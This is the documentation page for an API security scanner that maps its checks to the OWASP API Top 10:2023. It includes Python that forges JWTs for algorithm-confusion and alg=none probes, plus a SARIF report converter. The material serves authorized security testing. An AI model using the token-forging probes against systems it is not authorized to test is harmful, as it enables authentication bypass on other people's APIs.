vulnapi-scanner
OWASP API Security Top 10:2023 vulnerability scanner. Scan any API for auth bypass, IDOR, SQLi, RCE, rate limiting gaps, JWT vulns, SSRF, and more.
A comprehensive OWASP API Security Top 10:2023 vulnerability scanner built on top of the battle-tested cerberauth/vulnapi engine. Designed for developers, security engineers, and penetration testers who need fast, accurate API security assessments without leaving their Anvil workflow.
What It Does
vulnapi-scanner performs automated security scans against REST APIs, GraphQL endpoints, and gRPC services. It detects vulnerabilities mapped to the OWASP API Security Top 10:2023 including:
- API1 - Broken Object Level Authorization (BOLA/IDOR): Detects endpoints that return another user's object when the object identifier in the request is swapped
- API2 - Broken Authentication: Tests for weak JWT signing, missing expiry, algorithm confusion (RS256→HS256, where the server's RSA public key is accepted as an HMAC secret), and bearer token leakage
- API3 - Broken Object Property Level Authorization: Identifies mass assignment (writable fields the client should not control) and responses that expose more properties than the caller needs
- API4 - Unrestricted Resource Consumption: Detects missing or ineffective rate limiting and resource exhaustion vectors
- API5 - Broken Function Level Authorization: Discovers admin endpoints and fuzzes HTTP methods to find privileged operations reachable by ordinary users
- API6 - Unrestricted Access to Sensitive Business Flows: Detects workflows that can be abused by automation
- API7 - Server Side Request Forgery (SSRF): Probes URL-taking parameters for requests to internal network addresses
- API8 - Security Misconfiguration: CORS misconfiguration, verbose error messages, exposed debug endpoints, missing security headers
- API9 - Improper Inventory Management: Shadow API discovery, deprecated endpoint detection
- API10 - Unsafe Consumption of APIs: Checks on how the target handles data received from third-party integrations
The scanner covers 540+ endpoint patterns and generates structured JSON reports suitable for CI/CD integration, ticketing systems, and compliance documentation.
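The API2 JWT checks are easiest to understand with the probe tokens in hand. The following is an added example written for this page, not code from vulnapi-scanner or the cerberauth/vulnapi engine: it builds the two forged tokens a scanner sends for the algorithm-confusion (RS256→HS256) and alg=none checks, runs the static claim checks (missing expiry, missing audience), and classifies the server's answer. The sample token, claims and public-key PEM are constructed placeholders, and probe_verdict is a hypothetical helper. In a real probe the PEM must be the exact bytes the API publishes (for example at its JWKS endpoint), because that is what a confused verifier hands to HMAC.

```python
import base64
import hashlib
import hmac
import json


def _b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj: dict) -> str:
    # Compact JSON, sorted keys, base64url: the canonical JWT segment form
    return _b64url_encode(json.dumps(obj, separators=(",", ":"), sort_keys=True).encode())


def decode_jwt(token: str) -> tuple[dict, dict, str]:
    """Split a compact JWT into (header, claims, raw signature segment) without verifying it."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    return json.loads(_b64url_decode(header_b64)), json.loads(_b64url_decode(claims_b64)), sig_b64


# Constructed sample token: RS256 header, claims for an ordinary user, placeholder signature.
# Only the claims are reused by the probes, so no real RSA signature is needed here.
SAMPLE_CLAIMS = {"sub": "user-1001", "role": "user", "iat": 1700000000}
_PLACEHOLDER_SIG = _b64url_encode(bytes(32))
SAMPLE_TOKEN = ".".join([_segment({"alg": "RS256", "typ": "JWT"}), _segment(SAMPLE_CLAIMS), _PLACEHOLDER_SIG])

# Constructed placeholder for the server's public key (not a real key). In a real probe this
# must be the PEM text the API publishes, byte for byte, because a confused verifier feeds
# exactly those bytes to HMAC-SHA256.
SAMPLE_PUBLIC_KEY_PEM = b"-----BEGIN PUBLIC KEY-----\nEXAMPLE-NOT-A-REAL-KEY\n-----END PUBLIC KEY-----\n"


def forge_hs256_with_public_key(token: str, public_key_pem: bytes) -> str:
    """Algorithm-confusion probe: re-sign the captured claims with HS256, using the server's
    RSA public key bytes as the HMAC secret. A verifier that trusts the alg header and hands
    the same key object to both algorithms accepts this token."""
    _, claims, _ = decode_jwt(token)
    header = _segment({"alg": "HS256", "typ": "JWT"})
    signing_input = f"{header}.{_segment(claims)}"
    sig = hmac.new(public_key_pem, signing_input.encode("ascii"), hashlib.sha256).digest()
    return f"{signing_input}.{_b64url_encode(sig)}"


def forge_alg_none(token: str) -> str:
    """alg=none probe: same claims, no signature at all (trailing dot, empty segment)."""
    _, claims, _ = decode_jwt(token)
    header = _segment({"alg": "none", "typ": "JWT"})
    return f"{header}.{_segment(claims)}."


def hs256_signature_valid(token: str, key: bytes) -> bool:
    """The HMAC check a verifier performs for alg=HS256; shows the forged token passes it
    when the verifier's key material is the public key PEM."""
    header_b64, claims_b64, sig_b64 = token.split(".")
    expected = hmac.new(key, f"{header_b64}.{claims_b64}".encode("ascii"), hashlib.sha256).digest()
    return hmac.compare_digest(expected, _b64url_decode(sig_b64))


def claim_findings(token: str, now: int) -> list[str]:
    """Static checks on the token that need no server interaction."""
    header, claims, _ = decode_jwt(token)
    findings = []
    if "exp" not in claims:
        findings.append("missing exp claim (token never expires)")
    elif claims["exp"] <= now:
        findings.append("token is expired")
    if "aud" not in claims:
        findings.append("missing aud claim")
    if str(header.get("alg", "")).lower() == "none":
        findings.append("unsigned token (alg=none)")
    return findings


def probe_verdict(baseline_status: int, forged_status: int) -> str:
    """Hypothetical classifier: compare the HTTP status an authenticated endpoint returns for
    the legitimate token (baseline) with the status it returns for a forged token."""
    if not 200 <= baseline_status < 300:
        return "inconclusive: baseline request itself failed"
    if 200 <= forged_status < 300:
        return "vulnerable: forged token accepted"
    if forged_status in (401, 403):
        return "not vulnerable: forged token rejected"
    return f"inconclusive: unexpected status {forged_status}"


if __name__ == "__main__":
    print("HS256 probe token:", forge_hs256_with_public_key(SAMPLE_TOKEN, SAMPLE_PUBLIC_KEY_PEM))
    print("alg=none probe token:", forge_alg_none(SAMPLE_TOKEN))
    print("claim findings:", claim_findings(SAMPLE_TOKEN, 1700003600))
    print(probe_verdict(200, 200))
```

A scanner replays each forged token against an endpoint that succeeded with the original token; a 2xx on the forgery is the finding. Because the alg=none probe also tests the rejection of unsigned tokens, it should be sent even when the original token uses HS256.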
Installation
anvil skill install vulnapi-scanner
Usage
Basic Scan
/vulnapi https://api.example.com
Authenticated Scan (Bearer Token)
/vulnapi https://api.example.com --auth bearer:YOUR_TOKEN_HERE
Authenticated Scan (API Key)
/vulnapi https://api.example.com --auth apikey:x-api-key:YOUR_KEY
A credential passed on the command line is recorded in shell history and visible to other local users through the process list, so scan with a short-lived, least-privilege token and rotate it when the scan is done.
Scan with OpenAPI Spec
/vulnapi https://api.example.com --spec ./openapi.yaml
Targeted Scan (specific checks)
/vulnapi https://api.example.com --checks jwt,cors,ssrf --auth bearer:TOKEN
CI/CD Mode (non-zero exit code when any finding reaches the --fail-on severity)
/vulnapi https://api.example.com --auth bearer:TOKEN --fail-on high
Configuration Options
| Option | Description | Default |
|---|---|---|
| --auth | Authentication method: bearer, apikey, or basic (see Usage for the bearer:TOKEN and apikey:HEADER:KEY forms) | none |
| --spec | Path to an OpenAPI/Swagger spec file; without it, endpoints are discovered by crawling | auto-discover |
| --checks | Comma-separated list of checks to run (e.g. jwt,cors,ssrf) | all |
| --fail-on | Lowest severity that makes the scan exit non-zero: low, medium, high, critical | none |
| --output | Output format: json, sarif, html | json |
| --timeout | Per-request timeout in seconds | 10 |
| --rate-limit | Maximum requests per second sent to the target | 20 |
| --depth | Crawl depth for endpoint discovery | 3 |
Report Output
Reports include severity ratings (critical/high/medium/low/info), CWE IDs, CVSS scores, affected endpoints, evidence, and remediation guidance. Use --output sarif to produce a file the GitHub Security tab accepts through a code scanning upload; the default JSON output can be imported into DefectDojo.
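To show how the CI/CD mode and the report output fit together, here is an added example (not part of vulnapi-scanner, and not its real report schema) that applies a --fail-on style severity gate to a report and converts it into SARIF 2.1.0 for a GitHub code scanning upload. The report's JSON key names (findings, severity, cwe, cvss, endpoint, evidence, remediation) and the three sample findings are constructed assumptions, so adjust them to the real output before use. Results are anchored on an assumed openapi.yaml path because code scanning requires a file location for every result, and the endpoint is kept as a logical location and in the message.

```python
import json
import sys

SEVERITY_ORDER = {"info": 0, "low": 1, "medium": 2, "high": 3, "critical": 4}
# SARIF result levels; GitHub ranks alerts by the rule's security-severity property instead
SARIF_LEVEL = {"info": "note", "low": "note", "medium": "warning", "high": "error", "critical": "error"}

# Constructed sample report. The key names are an assumption for this example: the page lists
# what a report contains (severity, CWE, CVSS, endpoint, evidence, remediation) but not the
# exact JSON schema, so map the real field names onto these before use.
SAMPLE_REPORT = {
    "target": "https://api.example.com",
    "findings": [
        {"id": "jwt-alg-none", "owasp": "API2", "severity": "critical", "cwe": "CWE-347",
         "cvss": 9.1, "endpoint": "GET /v1/users/me",
         "evidence": "token with alg=none accepted (HTTP 200)",
         "remediation": "Pin the expected signing algorithm on the server and reject alg=none."},
        {"id": "rate-limit-missing", "owasp": "API4", "severity": "medium", "cwe": "CWE-770",
         "cvss": 5.3, "endpoint": "POST /v1/login",
         "evidence": "200 requests in 10 s, no 429 response",
         "remediation": "Enforce per-client rate limits on authentication endpoints."},
        {"id": "cors-origin-reflection", "owasp": "API8", "severity": "low", "cwe": "CWE-942",
         "cvss": 3.1, "endpoint": "GET /v1/health",
         "evidence": "Access-Control-Allow-Origin reflects any Origin with Allow-Credentials: true",
         "remediation": "Return an explicit allow-list of origins; never reflect the request Origin."},
    ],
}


def max_severity(report: dict) -> str:
    if not report["findings"]:
        return "info"
    return max((f["severity"] for f in report["findings"]), key=SEVERITY_ORDER.__getitem__)


def should_fail(report: dict, fail_on: str = "none") -> bool:
    """Mirror of --fail-on: True when any finding is at or above the threshold ("none" disables)."""
    if fail_on == "none":
        return False
    threshold = SEVERITY_ORDER[fail_on]
    return any(SEVERITY_ORDER[f["severity"]] >= threshold for f in report["findings"])


def gate_exit_code(report: dict, fail_on: str = "none") -> int:
    return 1 if should_fail(report, fail_on) else 0


def to_sarif(report: dict, tool_version: str = "unknown", spec_path: str = "openapi.yaml") -> dict:
    """Convert the report into SARIF 2.1.0. Code scanning needs each result to point at a file in
    the repository; an API endpoint is not a file, so results are attached to the OpenAPI spec
    (assumed path) and the endpoint is recorded as a logical location and in the message."""
    rules, results = {}, []
    for f in report["findings"]:
        rules.setdefault(f["id"], {
            "id": f["id"],
            "shortDescription": {"text": f"{f['owasp']}: {f['id']}"},
            "help": {"text": f["remediation"]},
            "properties": {
                "tags": ["security", f["cwe"], f["owasp"]],
                # GitHub reads security-severity (a 0-10 CVSS-style score) to rank alerts
                "security-severity": str(f["cvss"]),
            },
        })
        results.append({
            "ruleId": f["id"],
            "level": SARIF_LEVEL[f["severity"]],
            "message": {"text": f"{f['endpoint']}: {f['evidence']}"},
            "locations": [{
                "physicalLocation": {"artifactLocation": {"uri": spec_path}},
                "logicalLocations": [{"fullyQualifiedName": f["endpoint"], "kind": "resource"}],
            }],
            "properties": {"severity": f["severity"], "cvss": f["cvss"], "target": report["target"]},
        })
    return {
        "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
        "version": "2.1.0",
        "runs": [{
            "tool": {"driver": {"name": "vulnapi-scanner", "version": tool_version,
                                "rules": list(rules.values())}},
            "results": results,
        }],
    }


if __name__ == "__main__":
    # Usage: python gate.py report.json high   (no arguments: gate the constructed sample)
    report = json.load(open(sys.argv[1])) if len(sys.argv) > 1 else SAMPLE_REPORT
    fail_on = sys.argv[2] if len(sys.argv) > 2 else "high"
    with open("vulnapi.sarif", "w") as out:
        json.dump(to_sarif(report), out, indent=2)
    print(f"max severity: {max_severity(report)}; fail-on {fail_on}: exit {gate_exit_code(report, fail_on)}")
    sys.exit(gate_exit_code(report, fail_on))
```

The written vulnapi.sarif can be uploaded with the github/codeql-action/upload-sarif action in the same job; keeping the severity gate in a separate step means the upload still happens when the gate fails the build.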
Requirements
- Active Anvil session with network access to the target API
- For authenticated scans: valid credentials for the target API
- Target API must be reachable from the Anvil execution environment
- Permission to test the target: checks such as SSRF probing and resource-consumption testing send live, potentially disruptive traffic, so run the scanner only against APIs you are authorized to test, preferably a staging instance